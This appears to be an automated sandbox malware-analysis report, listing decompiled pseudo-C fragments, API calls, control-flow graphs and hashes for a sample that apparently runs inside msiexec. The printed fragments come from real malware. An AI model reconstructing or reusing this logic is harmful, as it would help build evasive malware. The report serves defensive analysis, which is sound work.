                      control_flow_graph 13 41a620-41a651 call 41af50 RtlAllocateHeap
                      APIs
                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: &EA
                      • API String ID: 1279760036-1330915590
                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                      • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                      • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 211 408309-40830b 212 408339-40835a call 40ace0 call 414e40 211->212 213 40830d-408336 call 41be50 call 41c9f0 211->213 222 40835c-40836e PostThreadMessageW 212->222 223 40838e-408392 212->223 213->212 224 408370-40838a call 40a470 222->224 225 40838d 222->225 224->225 225->223
                      C-Code - Quality: 67%
                      			E00408309(void* __ebx, void* __eflags, intOrPtr _a4, long _a12) {
                      				char _v67;
                      				char _v68;
                      				void* _t11;
                      				int _t12;
                      				char* _t21;
                      				long _t23;
                      				intOrPtr _t25;
                      				int _t27;
                      				intOrPtr _t29;
                      				intOrPtr _t31;
                      				intOrPtr _t35;
                      
                      				_t36 = __eflags;
                      				asm("in al, 0x42");
                      				if(__eflags == 0) {
                      					_t1 = __ebx - 0x1374aa47;
                      					_t35 =  *_t1;
                      					 *_t1 = _t31;
                      					_push(_t29);
                      					_t29 = _t35;
                      					_t31 = _t35 - 0x40;
                      					_push(_t25);
                      					_v68 = 0;
                      					E0041BE50( &_v67, 0, 0x3f);
                      					E0041C9F0( &_v68, 3);
                      					_t25 = _a4;
                      					_t21 =  &_v68;
                      				}
                      				_t11 = E0040ACE0(_t36, _t25 + 0x1c, _t21); // executed
                      				_t12 = E00414E40(_t25 + 0x1c, _t11, 0, 0, 0xc4e7b6d6);
                      				_t27 = _t12;
                      				if(_t27 != 0) {
                      					_t23 = _a12;
                      					_t12 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                      					_t38 = _t12;
                      					if(_t12 == 0) {
                      						_t12 =  *_t27(_t23, 0x8003, _t29 + (E0040A470(_t38, 1, 8) & 0x000000ff) - 0x40, _t12);
                      					}
                      				}
                      				return _t12;
                      			}















                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: f1784c0dacd1a97746b3ff5e2fe1a89af1dd1dd13fd7a8eb5922d3620bb9d174
                      • Instruction ID: c60474528973503b6e3d4f7b1e86d2aa81c484ba3d6bcd3f995390e9496bdaf8
                      • Opcode Fuzzy Hash: f1784c0dacd1a97746b3ff5e2fe1a89af1dd1dd13fd7a8eb5922d3620bb9d174
                      • Instruction Fuzzy Hash: 2801B571A80328B7EB21A6558D43FFF772CAB40B54F04412EFF04BA1C1DAB9690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 228 408310-40831f 229 408328-40835a call 41c9f0 call 40ace0 call 414e40 228->229 230 408323 call 41be50 228->230 238 40835c-40836e PostThreadMessageW 229->238 239 40838e-408392 229->239 230->229 240 408370-40838a call 40a470 238->240 241 40838d 238->241 240->241 241->239
                      C-Code - Quality: 82%
                      			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                      				char _v67;
                      				char _v68;
                      				void* _t12;
                      				intOrPtr* _t13;
                      				int _t14;
                      				long _t21;
                      				intOrPtr _t23;
                      				intOrPtr* _t25;
                      				void* _t26;
                      				void* _t30;
                      
                      				_t30 = __eflags;
                      				_v68 = 0;
                      				E0041BE50( &_v67, 0, 0x3f);
                      				E0041C9F0( &_v68, 3);
                      				_t23 = _a4;
                      				_t12 = E0040ACE0(_t30, _t23 + 0x1c,  &_v68); // executed
                      				_t13 = E00414E40(_t23 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                      				_t25 = _t13;
                      				if(_t25 != 0) {
                      					_t21 = _a8;
                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                      					_t32 = _t14;
                      					if(_t14 == 0) {
                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                      					}
                      					return _t14;
                      				}
                      				return _t13;
                      			}














                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                      • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                      • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                      • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 268 41a652-41a677 call 41af50 270 41a67c-41a691 RtlFreeHeap 268->270
                      C-Code - Quality: 100%
                      			E0041A652(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                      				char _t11;
                      				void* _t17;
                      
                      				 *0x55ce523e = 0xe128aff2;
                      				_t8 = _a4;
                      				_t3 = _t8 + 0xc74; // 0xc74
                      				E0041AF50(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                      				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                      				return _t11;
                      			}






                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                      • Instruction ID: f5a133981db5de69143246aa9e779778ced1e27caef6fa814550706276b7310b
                      • Opcode Fuzzy Hash: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                      • Instruction Fuzzy Hash: 97E06DB12142046FD714DF98DC44E9B3768AF48310F004549F90C5B242C630ED14CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 274 41a660-41a676 275 41a67c-41a691 RtlFreeHeap 274->275 276 41a677 call 41af50 274->276 276->275
                      C-Code - Quality: 100%
                      			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                      				char _t10;
                      				void* _t15;
                      
                      				_t3 = _a4 + 0xc74; // 0xc74
                      				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                      				return _t10;
                      			}






                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                      				int _t10;
                      				void* _t15;
                      
                      				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                      				return _t10;
                      			}






                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 60%
                      			E0040ACD3(void* __ebx, signed char _a8) {
                      				struct _EXCEPTION_RECORD _v8;
                      				struct _OBJDIR_INFORMATION _v12;
                      				char _v536;
                      				struct _OBJDIR_INFORMATION _t14;
                      				void* _t20;
                      				struct _OBJDIR_INFORMATION _t22;
                      				struct _EXCEPTION_RECORD _t28;
                      				void* _t31;
                      				void* _t34;
                      				void* _t38;
                      
                      				if(__ebx > __ebx) {
                      					L8:
                      					asm("cld");
                      					_t14 = E0041B490(_t28);
                      					_v12 = _t14;
                      					__eflags = _t14;
                      					if(_t14 == 0) {
                      						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                      						_t14 = _v12;
                      					}
                      					return _t14;
                      				} else {
                      					asm("invalid");
                      					asm("enter 0x854a, 0xc5");
                      					_push(_t31);
                      					_t31 = _t34;
                      					_t26 = _a8;
                      					_v8 =  &_v536;
                      					_t20 = E0041CC40( &_v12, 0x104, _a8);
                      					_t38 = _t34 - 0x214 + 0xc;
                      					if(_t20 != 0) {
                      						_push(_v8);
                      						_t22 = E0041D060(_t26, __eflags);
                      						_t34 = _t38 + 4;
                      						__eflags = _t22;
                      						if(_t22 != 0) {
                      							E0041D2E0( &_v12, 0);
                      							_t34 = _t34 + 8;
                      						}
                      						_t28 = _v8;
                      						goto L8;
                      					} else {
                      						return _t20;
                      					}
                      				}
                      			}














                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction ID: 0100dda9211f4f49bdda9a44b065ce2ab9e5eac326fa31b3b38c2924a80330d7
                      • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction Fuzzy Hash: DCE04FB5E0010EAAEB00DAA4D841F9EB374EB48309F008195A91897640E634EA548B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A6A0(intOrPtr _a4, int _a8) {
                      				void* _t10;
                      
                      				_t5 = _a4;
                      				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                      				ExitProcess(_a8);
                      			}





                      APIs
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                      • Instruction ID: 828f9609f8c6effedad16f9150fff7105cb7980b6009243bdb24b30f8e16e59a
                      • Opcode Fuzzy Hash: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                      • Instruction Fuzzy Hash: E3B09B719015C5C5E711D7704B0871779147BD0741F16C061D1060641A4778C491F5B6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                      • Instruction ID: 0e6765a25468c69b2624b40f8f06144e64d4346cad136b04e345330c0ab46e0f
                      • Opcode Fuzzy Hash: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                      • Instruction Fuzzy Hash: BF9002E1201140925601A2698804B0A45159BE0341B51C026E1085560CC5658851E175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                      • Instruction ID: 334631062774b9612c65657e267ef719efd856e49e018b8a83bb731c441f91a8
                      • Opcode Fuzzy Hash: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                      • Instruction Fuzzy Hash: BA900271A0500012A24171694C146464016ABE0781B55C021A0545554C89948A55A3E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                      • Instruction ID: e2561301e82270e67f6abec70d7f891f8dfa85b83f608a3ed377ae451cc9517c
                      • Opcode Fuzzy Hash: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                      • Instruction Fuzzy Hash: 09900265221000021246A5690A0450B0455ABD6391391C025F1447590CC6618865A361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                      • Instruction ID: 773d2778dc8467259886de77418e663aad584267f8fb983b22409e47d37edf84
                      • Opcode Fuzzy Hash: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                      • Instruction Fuzzy Hash: 0690027120100842E20161694804B4600159BE0341F51C026A0155654D8655C851B561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                      • Instruction ID: 1b18bb7ebf4985a1fe1d89210cd1d63bb8dd790e35b63933ab7dd85c463568f6
                      • Opcode Fuzzy Hash: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                      • Instruction Fuzzy Hash: D390027160500802E2517169481474600159BD0341F51C021A0055654D87958A55B6E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                      • Instruction ID: 40568eb9cce82f8a2e265eeae2014845f5c5f0812fd232a502a3856d9fd4dd68
                      • Opcode Fuzzy Hash: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                      • Instruction Fuzzy Hash: 5D90027120504842E24171694804A4600259BD0345F51C021A0095694D96658D55F6A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                      • Instruction ID: d9ce752e7a32312a3939176bb8d94f530101acef4cb3165c33e07ba2be6f1b8d
                      • Opcode Fuzzy Hash: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                      • Instruction Fuzzy Hash: 5B90027131114402E2116169880470600159BD1341F51C421A0855558D86D58891B162
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                      • Instruction ID: 41fc6f2be9d9b3c914add4c375e4b6b746089fedf2e3854bc7eb621d312c9217
                      • Opcode Fuzzy Hash: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                      • Instruction Fuzzy Hash: 8F90026160500402E2417169581870600259BD0341F51D021A0055554DC6998A55B6E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction ID: dce6f95e1f134ab0a79cdc3f723e5afd6aecce0543b1d29046b612bf1790e284
                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 53%
                      			E00ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
                      				void* _t7;
                      				intOrPtr _t9;
                      				intOrPtr _t10;
                      				intOrPtr* _t12;
                      				intOrPtr* _t13;
                      				intOrPtr _t14;
                      				intOrPtr* _t15;
                      
                      				_t13 = __edx;
                      				_push(_a4);
                      				_t14 =  *[fs:0x18];
                      				_t15 = _t12;
                      				_t7 = E00A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                      				_push(_t13);
                      				E00AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                      				_t9 =  *_t15;
                      				if(_t9 == 0xffffffff) {
                      					_t10 = 0;
                      				} else {
                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                      				}
                      				_push(_t10);
                      				_push(_t15);
                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                      				return E00AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                      			}











                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABFDFA
                      Strings
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ABFE01
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ABFE2B
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                      • Instruction ID: 4c6026f4567993a0dca8f7e8eea1f2696076978149833d754e41f9757770f907
                      • Opcode Fuzzy Hash: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                      • Instruction Fuzzy Hash: 20F0C236604601BFDA211A55DD02FB3BB6EEB45730F240614F628565E2DA62F87097E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:4.4%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:591
                      Total number of Limit Nodes:78

                      Graph


                      Executed Functions

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 287 6da34a-6da3a1 call 6daf50 NtCreateFile
                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,006D4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006D4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 006DA39D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      • Opcode ID: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                      • Instruction ID: 68ff250cc482efac20ba0868bf9f117fe0f29662e63a2e1617f7f60679012e23
                      • Opcode Fuzzy Hash: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                      • Instruction Fuzzy Hash: 8E01B2B2204108AFCB58CF99DC85EEB77A9AF8C754F15824CFA5D97291C630E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 290 6da350-6da366 291 6da36c-6da3a1 NtCreateFile 290->291 292 6da367 call 6daf50 290->292 292->291
                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,006D4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006D4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 006DA39D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                      • Instruction ID: c8dbfd3132b04056ef19d92569d7f948fe32d63aecd5f94acb2cabb10ad42947
                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                      • Instruction Fuzzy Hash: 15F0BDB2204208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 293 6da3fb-6da449 call 6daf50 NtReadFile
                      APIs
                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jm,FFFFFFFF,?,bMm,?,00000000), ref: 006DA445
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !Jm
                      • API String ID: 2738559852-4284174255
                      • Opcode ID: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                      • Instruction ID: b29a28434e1a96149682683bea74cf6940dc547dd69a11b52082b816f127c245
                      • Opcode Fuzzy Hash: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                      • Instruction Fuzzy Hash: EBF092B6200208AFCB14DF89DC91EEB77A9EF8C754F168259FA1D97245D630E911CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 296 6da400-6da416 297 6da41c-6da449 NtReadFile 296->297 298 6da417 call 6daf50 296->298 298->297
                      APIs
                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jm,FFFFFFFF,?,bMm,?,00000000), ref: 006DA445
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !Jm
                      • API String ID: 2738559852-4284174255
